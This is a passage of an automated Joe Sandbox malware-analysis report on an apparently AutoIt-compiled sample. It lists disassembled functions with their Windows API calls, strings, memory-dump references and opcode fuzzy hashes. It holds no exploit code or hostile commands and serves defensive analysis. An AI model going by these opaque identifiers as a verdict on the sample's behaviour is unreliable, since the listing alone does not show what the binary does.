                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$DestroyMove
                                    • String ID: static
                                    • API String ID: 2139405536-2160076837
                                    • Opcode ID: c3c5f86a757200d4d4b81def1e4983b4e948a3ee263690d3f35a153bba3836fd
                                    • Instruction ID: 48799173540fbe933459269add76b207c04179eeb262195f0bcfa74cde7d934d
                                    • Opcode Fuzzy Hash: c3c5f86a757200d4d4b81def1e4983b4e948a3ee263690d3f35a153bba3836fd
                                    • Instruction Fuzzy Hash: 17317C71110644AAEB119F79CC80BBB73ADFF99764F008619F9A9C71A0DA31AC82C760
                                    Function 009C5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009C51C6
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 009C5201
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 3ef0cfd0e93fdca41a1401ef0dfdc92bc62b9d3d6f4c51fefd21cf5b23c5bccf
                                    • Instruction ID: 1fa709b9c4029c1341cc3ebac93cc366de5972a730c1d395d309eb88bdd44625
                                    • Opcode Fuzzy Hash: 3ef0cfd0e93fdca41a1401ef0dfdc92bc62b9d3d6f4c51fefd21cf5b23c5bccf
                                    • Instruction Fuzzy Hash: F431D571E007049BEB24CF99D845FAEBBFCAF85350F15401DE9A1A61A0D770A984DB12
                                    Function 009D658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __snwprintf
                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                    • API String ID: 2391506597-2584243854
                                    • Opcode ID: b9af70c0a35ef723213c0feb55d16ee02fec04ee5742909807e9155c3c0759ad
                                    • Instruction ID: 59058fe38fafe55d6469d001a849faad6f4bd13236cd63fc520fb937d4899006
                                    • Opcode Fuzzy Hash: b9af70c0a35ef723213c0feb55d16ee02fec04ee5742909807e9155c3c0759ad
                                    • Instruction Fuzzy Hash: 0E217171644219AFCF10EFA4C882FEE77B4BF95744F40485AF505AB281DB70EA45CBA1
                                    Function 009E93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 009E945C
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 009E9467
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 078b82ecb9af92e3fd920d9d8a434b39ef3f1f8b9e15978c0384c520e403d0a0
                                    • Instruction ID: 0109a1078c69616cef20d6eaa2950dd8ca08287b3c2dce3b115fd424633dc32d
                                    • Opcode Fuzzy Hash: 078b82ecb9af92e3fd920d9d8a434b39ef3f1f8b9e15978c0384c520e403d0a0
                                    • Instruction Fuzzy Hash: BB116071210258AFEF26DE55DC80EBB376FEB893A4F104125F919972E0E6719C528760
                                    Function 009E98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                      • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                      • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                    • GetWindowRect.USER32(00000000,?), ref: 009E9968
                                    • GetSysColor.USER32(00000012), ref: 009E9982
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: f7318725d3bf3ab9085141b182ea2e3b6f5e4dafea4a712dccf17551f485c091
                                    • Instruction ID: d121deab6dcc21004289d65d8789bec0d943943dfd995a7dc69ef0bb8273b543
                                    • Opcode Fuzzy Hash: f7318725d3bf3ab9085141b182ea2e3b6f5e4dafea4a712dccf17551f485c091
                                    • Instruction Fuzzy Hash: DA116772520209AFDB05DFF8CC45AEA7BA8FB48304F014A28F955E3251E735E851DB60
                                    Function 009E9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 009E9699
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009E96A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: b2bfdcfec53f2117261b9b6b690dac309505e745e11eac6d34783733608466bb
                                    • Instruction ID: 7143405c36960dac7e75f65741b7540be306925499daf0a984018ea2f529b488
                                    • Opcode Fuzzy Hash: b2bfdcfec53f2117261b9b6b690dac309505e745e11eac6d34783733608466bb
                                    • Instruction Fuzzy Hash: 0F11BC72100188ABEF128FA9DC80EEB3B6EEB457B8F100716F925971E0C736DC919760
                                    Function 009C5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009C52D5
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009C52F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: 9b2a877ae7e3177224ffb3406289324aba5e5d53ecc932cec026d8697432f308
                                    • Instruction ID: 12717a721e6cdf932634e1a965f8ac30d00582a20a8fb6fb473baee0d5f9db3e
                                    • Opcode Fuzzy Hash: 9b2a877ae7e3177224ffb3406289324aba5e5d53ecc932cec026d8697432f308
                                    • Instruction Fuzzy Hash: D2110336E00614EBDB10DA98C840F9D77ECAB86350F060019E812E7190D3B0BD81CB92
                                    Function 009D4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 009D4DF5
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 009D4E1E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: 4dc0ee3b2f37021aaf56360915836baef455079c9c9f5a92ffbb544cd12996df
                                    • Instruction ID: 8731057b6890bfd28537abcecbbff4a36de92e5e617f177aac8fc402152f4d2f
                                    • Opcode Fuzzy Hash: 4dc0ee3b2f37021aaf56360915836baef455079c9c9f5a92ffbb544cd12996df
                                    • Instruction Fuzzy Hash: 21119A71581225BBDB258BA18889EEBFBADFB06794F10C62BF50596280D3706981C6F0
                                    Function 009DA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                    • htons.WSOCK32(00000000,?,00000000), ref: 009DA88B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: htonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 3832099526-2422070025
                                    • Opcode ID: b5c7dceb8066e1c71f984529bb9977942890f02d6ae0a135b72b13c03a85403f
                                    • Instruction ID: fd4a273d6c8b46b6c93520ddff52aed17ce38869731d540d784be4b8b6e16cdf
                                    • Opcode Fuzzy Hash: b5c7dceb8066e1c71f984529bb9977942890f02d6ae0a135b72b13c03a85403f
                                    • Instruction Fuzzy Hash: B001D675640304ABCB11DFA4C856FA9B368EF44314F10882BF915973D1D771E812D752
                                    Function 009BB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009BB7EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 0907bc11a31f7ca73299fa0c4702a09d95d295a4591c1655245480670145c1f7
                                    • Instruction ID: 09f3f347d836ed58154818a6fc86fc63458a84e7213978c2addf8ef667846987
                                    • Opcode Fuzzy Hash: 0907bc11a31f7ca73299fa0c4702a09d95d295a4591c1655245480670145c1f7
                                    • Instruction Fuzzy Hash: 7101D4B5641118ABCB04FBA4CD52AFE33ADBF85360B040A1DF462673D2EFB45908C7A0
                                    Function 009BB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 009BB6EB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 5a510ed2646f0ce2c69b02458f385af35814a6eaf6fb8ba802226aef9f7a6e56
                                    • Instruction ID: 885e0fb1ef1a48c4ce083ed8b4d8932c8120acd691fc5f4143d2d3a1c4faaa10
                                    • Opcode Fuzzy Hash: 5a510ed2646f0ce2c69b02458f385af35814a6eaf6fb8ba802226aef9f7a6e56
                                    • Instruction Fuzzy Hash: A10162B5A41108ABCB14FBA4CA53BFE73AD9F45354F10002DB502B32D2EBA45E1897B5
                                    Function 009BB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 009BB76C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 0bdc322aa504e5afe943d9fe1da5d38b453ce78739bdc410e2f35239e1b250c6
                                    • Instruction ID: 8beda26d8876d06cd25bf7d1f37209e99bd3dcf3d656a06b5305efcb8a8a8c74
                                    • Opcode Fuzzy Hash: 0bdc322aa504e5afe943d9fe1da5d38b453ce78739bdc410e2f35239e1b250c6
                                    • Instruction Fuzzy Hash: B30162B6641104BBCB14FBA4DA52BFE73AC9F45354F50001AB402B32D2EBA45E1987B5
                                    Function 009C7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    • API String ID: 2292705959-463685578
                                    • Opcode ID: 183c3f18c17589a445c93d8e6370416463c3c0bd566fab9c39bfb11d09e1f036
                                    • Instruction ID: 5ab20bb47da1383560c7692a7d005378437d70a2ff66d4eae86dac505e9ef962
                                    • Opcode Fuzzy Hash: 183c3f18c17589a445c93d8e6370416463c3c0bd566fab9c39bfb11d09e1f036
                                    • Instruction Fuzzy Hash: 0EE09277A042282BDB10EAE5DC0AF87FBACAB91764F00001AB905E7081D760A60287D4
                                    Function 009BA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009BA63F
                                      • Part of subcall function 009A13F1: _doexit.LIBCMT ref: 009A13FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Message_doexit
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 1993061046-4017498283
                                    • Opcode ID: d630177a759b87d257d405e496fc53c555c8a9c8001726fe811c415f56c25e9c
                                    • Instruction ID: a601cf1138cf05495354a901236fe116a817ae3e04cb9f6e20366c89c0cb76f5
                                    • Opcode Fuzzy Hash: d630177a759b87d257d405e496fc53c555c8a9c8001726fe811c415f56c25e9c
                                    • Instruction Fuzzy Hash: D3D05B323C432877D61436DC7C17FD5764C9B55B61F054416BB08D95C24DD2958142D9
                                    Function 009FAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?), ref: 009FACC0
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009FAEBD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DirectoryFreeLibrarySystem
                                    • String ID: WIN_XPe
                                    • API String ID: 510247158-3257408948
                                    • Opcode ID: 037c90c4d08a1837efb46421645e44f6d5d870b93d87c5ad6901ccfe96544600
                                    • Instruction ID: a4f3aa5fcf26bd500cbd09d97fcecb7f274e17c8c544080d54b83c0b72349f9e
                                    • Opcode Fuzzy Hash: 037c90c4d08a1837efb46421645e44f6d5d870b93d87c5ad6901ccfe96544600
                                    • Instruction Fuzzy Hash: 1DE065B5C0014DDFCB11DBE9D944AFCF7BCAB48300F108082E196B2160CB345A45DF21
                                    Function 009E8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009E86A2
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009E86B5
                                      • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 24191f869a45c2edc510e3d6735042827c04f04874ff4e5dbcdb8f9475498890
                                    • Instruction ID: 4beecda42c57ad4fd3529971aac125f65afcbdd04f3b4c4f97df618bc4a810a7
                                    • Opcode Fuzzy Hash: 24191f869a45c2edc510e3d6735042827c04f04874ff4e5dbcdb8f9475498890
                                    • Instruction Fuzzy Hash: EFD01233798318BBE768A7F09C4FFC67A18AF44B11F100819B749AA1D0C9E1E942CB54
                                    Function 009E86CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009E86E2
                                    • PostMessageW.USER32(00000000), ref: 009E86E9
                                      • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: a700d01a96f740e53bfa98cc601d97043d436147d35e52ae7720e0d31e2cae28
                                    • Instruction ID: eb8b54abff5f1af58370302c5dfa56da5d7cb4f31458227ab19213a80e9423f5
                                    • Opcode Fuzzy Hash: a700d01a96f740e53bfa98cc601d97043d436147d35e52ae7720e0d31e2cae28
                                    • Instruction Fuzzy Hash: AED0C9327853187BE668A7F09C4BFC66A18AB44B11F100819B645AA1D0C9A1A9428A55